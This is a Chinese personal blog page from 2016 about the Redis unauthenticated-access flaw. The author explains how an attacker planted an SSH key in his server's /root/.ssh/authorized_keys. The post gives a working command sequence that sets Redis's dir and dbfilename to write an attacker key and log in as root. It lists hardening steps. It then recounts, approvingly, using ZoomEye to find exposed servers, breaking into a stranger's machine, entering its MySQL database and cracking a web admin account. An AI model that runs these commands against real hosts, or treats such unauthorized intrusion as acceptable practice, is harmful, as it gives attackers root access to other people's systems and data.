<!doctype html>



  


<html class="theme-next pisces use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Redis,SSH,漏洞,攻击," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />






<meta name="description" content="在没有安全防范的情况下使用Redis“漏洞”可以将本机SSH的id_rsa.pub写入到目标机器/root/.ssh/authorize_keys文件中，从而获取目标机器的免登录root权限，而这对于目标机器来说，无疑是一种灾难

被攻击阿里云使用Redis的默认配置启动服务，没有设置密码，为了方便远程连接，服务器防火墙开了Redis默认的6379端口以及SSH的22端口，并且没有限制访问IP。">
<meta property="og:type" content="article">
<meta property="og:title" content="Redis“漏洞”，SSH免登录攻击">
<meta property="og:url" content="http://chenchi.me/2016/08/18/Redis“漏洞”，SSH免登录攻击/index.html">
<meta property="og:site_name" content="ccincd's blog">
<meta property="og:description" content="在没有安全防范的情况下使用Redis“漏洞”可以将本机SSH的id_rsa.pub写入到目标机器/root/.ssh/authorize_keys文件中，从而获取目标机器的免登录root权限，而这对于目标机器来说，无疑是一种灾难

被攻击阿里云使用Redis的默认配置启动服务，没有设置密码，为了方便远程连接，服务器防火墙开了Redis默认的6379端口以及SSH的22端口，并且没有限制访问IP。">
<meta property="og:image" content="http://oax5iq75d.bkt.clouddn.com/%E5%9B%BE1.png">
<meta property="og:updated_time" content="2016-08-18T15:45:44.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Redis“漏洞”，SSH免登录攻击">
<meta name="twitter:description" content="在没有安全防范的情况下使用Redis“漏洞”可以将本机SSH的id_rsa.pub写入到目标机器/root/.ssh/authorize_keys文件中，从而获取目标机器的免登录root权限，而这对于目标机器来说，无疑是一种灾难

被攻击阿里云使用Redis的默认配置启动服务，没有设置密码，为了方便远程连接，服务器防火墙开了Redis默认的6379端口以及SSH的22端口，并且没有限制访问IP。">
<meta name="twitter:image" content="http://oax5iq75d.bkt.clouddn.com/%E5%9B%BE1.png">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>




  <link rel="canonical" href="http://chenchi.me/2016/08/18/Redis“漏洞”，SSH免登录攻击/"/>

  <title> Redis“漏洞”，SSH免登录攻击 | ccincd's blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  



  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "//hm.baidu.com/hm.js?09e9d3bc12a88fa2a8c6d9e74bd5fc72";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>








  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">ccincd's blog</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle">陈驰的博客</p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                Redis“漏洞”，SSH免登录攻击
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-08-18T21:43:48+08:00" content="2016-08-18">
              2016-08-18
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/技术/" itemprop="url" rel="index">
                    <span itemprop="name">技术</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2016/08/18/Redis“漏洞”，SSH免登录攻击/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="2016/08/18/Redis“漏洞”，SSH免登录攻击/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <blockquote>
<p><em>在没有安全防范的情况下使用Redis“漏洞”可以将本机SSH的id_rsa.pub写入到目标机器/root/.ssh/authorize_keys文件中，从而获取目标机器的免登录root权限，而这对于目标机器来说，无疑是一种灾难</em></p>
</blockquote>
<h3 id="被攻击"><a href="#被攻击" class="headerlink" title="被攻击"></a>被攻击</h3><p>阿里云使用Redis的默认配置启动服务，没有设置密码，为了方便远程连接，服务器防火墙开了Redis默认的6379端口以及SSH的22端口，并且没有限制访问IP。这样做相当于把Redis暴露到公网，攻击者可以查询、修改Redis数据，甚至关闭、破坏Redis服务，考虑到目前Redis存储从数据量和重要性上需求都不大，所以并没有引起我对安全的重视。</p>
<p>最近发现之前配置的SSH免登录失效了，/root/.ssh/authorized_keys文件里面出现了类似于乱码的内容，如图1所示：</p>
<p><img src="http://oax5iq75d.bkt.clouddn.com/%E5%9B%BE1.png" alt="图1"></p>
<p>一开始并没有注意到文件开头的REDIS0006字样，以为是乱码，于是把内容清空了，并将自己的id_rsa.pub重新放入其中，但没过多久，文件又恢复了原样，并且有服务器被异地登录的异常。我试着搜了下REDIS0006，因此了解到这并不是简简单单的猜测到或者暴力破解到root密码的问题。</p>
<h3 id="漏洞介绍"><a href="#漏洞介绍" class="headerlink" title="漏洞介绍"></a>漏洞介绍</h3><p>Redis服务暴露到公网，没有设置密码和其它安全策略，并且使用root权限启动，那么攻击者可以使用config命令将redis的dbfile设置为/root/.ssh下的authorized_keys，虽然名字与Linux系统的授权文件相同，但实际上是偷梁换柱，将Redis的数据库文件设置到.ssh文件夹下并覆盖原授权文件。</p>
<p>因为攻击者拥有Redis的读写权限，因而可以将自己本机的id_rsa.pub伪装成Redis值的方式写入到authorized_keys文件中，从而实现SSH免登录，并且由于授权文件位于/root下，因而获得了root权限。</p>
<p><span id="jump"></span></p>
<h3 id="攻击复现"><a href="#攻击复现" class="headerlink" title="攻击复现"></a>攻击复现</h3><blockquote>
<p>假定目标机器ip为12.34.56.78</p>
</blockquote>
<ol>
<li><p>本地生成SSH公钥和私钥：ssh-keygen -t rsa -C “yourname@youremail.com”</p>
</li>
<li><p>依次执行命令：</p>
 <figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line">// 将SSH公钥存入文件，加\n\n是为了匹配Redis的存储格式</div><div class="line">1. (<span class="built_in">echo</span> <span class="_">-e</span> <span class="string">"\n\n"</span>; cat id_rsa.pub; <span class="built_in">echo</span> <span class="_">-e</span> <span class="string">"\n\n"</span>) &gt; foo.txt</div><div class="line">// 连接目标服务器的Redis，并设置键foo的值为上一条命令的内容</div><div class="line">2. cat foo.txt | redis-cli -h 12.34.56.78 -x <span class="built_in">set</span> foo</div><div class="line">// 登录目标服务器的Redis</div><div class="line">3. redis-cli -h 12.34.56.78</div><div class="line">// 使用config命令将Redis的工作目录切换到/root/.ssh/下</div><div class="line">4. config <span class="built_in">set</span> dir /root/.ssh/</div><div class="line">// 设置Redis的数据存储文件为authorized_keys</div><div class="line">5. config <span class="built_in">set</span> dbfilename authorized_keys</div><div class="line">// 将Redis数据，也即键foo的值写入文件中</div><div class="line">6. save</div><div class="line">// 免密码登录目标主机，并获取root权限</div><div class="line">7. ssh root@12.34.56.78</div></pre></td></tr></table></figure>
</li>
</ol>
<h3 id="解决方案"><a href="#解决方案" class="headerlink" title="解决方案"></a>解决方案</h3><blockquote>
<p>以下解决方案并非要全部实现，但使用的越多，系统会越安全</p>
</blockquote>
<ol>
<li>bind IP地址为127.0.0.1，而非使用默认的0.0.0.0</li>
<li>设置Redis密码</li>
<li>将config命令重命名为一串不易猜到的内容，如rename-command config “d901das8dhwq98sadwq9”</li>
<li>不使用root启动Redis服务</li>
<li>不使用默认的6379端口，或在防火墙中屏蔽掉Redis的对外接口，或配置IP访问规则，或者直接禁用掉SSH使用的22端口</li>
</ol>
<h3 id="攻击演练"><a href="#攻击演练" class="headerlink" title="攻击演练"></a>攻击演练</h3><p>在<a href="https://www.zoomeye.org/" target="_blank" rel="external">ZoomEye</a>上搜<a href="https://www.zoomeye.org/search?q=port%3A6379&amp;t=host" target="_blank" rel="external">port:6379</a>，找到宿主机运行Linux系统并且没有设置密码校验的机器IP，按照<a href="#jump">步骤3</a>的攻击方式，手动（真正的黑客一般不会这么玩）进行演练，约一个小时的时间才成功登录一台机器，虽然效率比较低，但获取那台机器的root权限之后我又以root身份登录了MySQL数据库，并且破解了Web应用的管理员账号，如果想要摧毁服务和系统，不费吹灰之力，当然我肯定不会这么做，因为我不是一个破坏者。</p>
<p>从上述演练可以看出来，被获取root权限的结果是多么的可怕，😱，身为一名开发人员，也应当有一定的安全意识，不然如果遇到互联网世界里的“坏人”，想要挽回损失就追悔莫及了。</p>
<h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><p><a href="http://blog.jobbole.com/94518/" target="_blank" rel="external">Redis 未授权访问缺陷可轻易导致系统被黑</a></p>
<p><a href="http://blog.csdn.net/whs_321/article/details/51734602" target="_blank" rel="external">记录一次攻击事件(redis 未授权漏洞利用直接登录服务器)</a></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Redis/" rel="tag">#Redis</a>
          
            <a href="/tags/SSH/" rel="tag">#SSH</a>
          
            <a href="/tags/漏洞/" rel="tag">#漏洞</a>
          
            <a href="/tags/攻击/" rel="tag">#攻击</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/08/09/好的编码习惯/" rel="next" title="好的编码习惯">
                <i class="fa fa-chevron-left"></i> 好的编码习惯
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2016/08/21/Linux调整-root硬盘空间/" rel="prev" title="Linux调整/root硬盘空间">
                Linux调整/root硬盘空间 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
        <div class="ds-share flat" data-thread-key="2016/08/18/Redis“漏洞”，SSH免登录攻击/"
     data-title="Redis“漏洞”，SSH免登录攻击"
     data-content=""
     data-url="http://chenchi.me/2016/08/18/Redis“漏洞”，SSH免登录攻击/">
  <div class="ds-share-inline">
    <ul  class="ds-share-icons-16">

      <li data-toggle="ds-share-icons-more"><a class="ds-more" href="javascript:void(0);">分享到：</a></li>
      <li><a class="ds-weibo" href="javascript:void(0);" data-service="weibo">微博</a></li>
      <li><a class="ds-qzone" href="javascript:void(0);" data-service="qzone">QQ空间</a></li>
      <li><a class="ds-qqt" href="javascript:void(0);" data-service="qqt">腾讯微博</a></li>
      <li><a class="ds-wechat" href="javascript:void(0);" data-service="wechat">微信</a></li>

    </ul>
    <div class="ds-share-icons-more">
    </div>
  </div>
</div>
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="2016/08/18/Redis“漏洞”，SSH免登录攻击/"
           data-title="Redis“漏洞”，SSH免登录攻击" data-url="http://chenchi.me/2016/08/18/Redis“漏洞”，SSH免登录攻击/">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="http://oax5iq75d.bkt.clouddn.com/IMG_9837.JPG"
               alt="Chi Chen" />
          <p class="site-author-name" itemprop="name">Chi Chen</p>
          <p class="site-description motion-element" itemprop="description">一涧入苍烟，千花绕涧边；花开与花落，流水送流年</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">9</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">3</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">20</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#被攻击"><span class="nav-number">1.</span> <span class="nav-text">被攻击</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞介绍"><span class="nav-number">2.</span> <span class="nav-text">漏洞介绍</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#攻击复现"><span class="nav-number">3.</span> <span class="nav-text">攻击复现</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#解决方案"><span class="nav-number">4.</span> <span class="nav-text">解决方案</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#攻击演练"><span class="nav-number">5.</span> <span class="nav-text">攻击演练</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#参考"><span class="nav-number">6.</span> <span class="nav-text">参考</span></a></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2016</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Chi Chen</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="http://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>

        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.0.1"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"ccincd"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
    <script src="/vendors/ua-parser-js/dist/ua-parser.min.js?v=0.7.9"></script>
    <script src="/js/src/hook-duoshuo.js"></script>
  






  
  

  

  

  

</body>
</html>
